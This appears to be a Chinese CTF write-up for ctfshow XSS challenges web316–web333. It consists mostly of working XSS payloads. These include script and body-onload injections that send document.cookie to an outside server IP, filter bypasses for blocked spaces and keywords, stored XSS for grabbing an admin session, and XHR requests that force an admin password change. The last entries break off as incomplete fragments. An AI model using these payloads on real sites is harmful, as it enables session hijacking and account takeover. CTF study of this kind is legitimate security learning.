开始ctfshow小版块的学习,坚持每周末一个小板块,加油加油

我是在自己服务器上面搭建了一个蓝莲花的xss平台
web316
| 1 | <script>document.location.href="http://ip/xss.php?cookie="+document.cookie</script> | 
web317-web319
相较于上一题过滤了script
| 1 | <body onload=location.href="http://8.130.42.53/xss/?cookie="+document.cookie> | 
web230-web231
这题过滤了空格
用/或者/**/
| 1 | <body/onload=location.href="http://8.130.42.53/xss/?cookie="+document.cookie> | 
web232-web236
不能有xss这三个字母
| 1 | <body/onload=location.href="http://8.130.42.53/6/?cookie="+document.cookie> | 
web237
存储型xss

web238
| 1 | <script>window.location.href='http://8.130.42.53/6/?cookie='+document.cookie;</script> | 
在注册里面密码放入payload,然后修改PHPSESSID访问用户管理界面会看到flag一闪而过,拼手速截图的时候到了
 
web329
长得还是和上题一样
web330
| 1 | <script>window.location.href='http://127.0.0.1/api/change.php?p=123';</script> | 
在注册界面输入paylaod,强迫管理员修改密码
web331
这题改成发送POST请求了,就不能使用windows.open了
js发送请求的方式
| 1 | var url = "http://localhost:8080/login"; | 
payload
| 1 | <script>var httpRequest = new XMLHttpRequest();httpRequest.open('POST', 'http://127.0.0.1/api/change.php', true);httpRequest.setRequestHeader("Content-type","application/x-www-form-urlencoded");httpRequest.send('p=1234567');</script> | 
web332
使用逻辑漏洞,转账负数自己的钱就会涨
web333
| 1 | $.ajax({ | 
| 1 | <script src=$.ajax({ |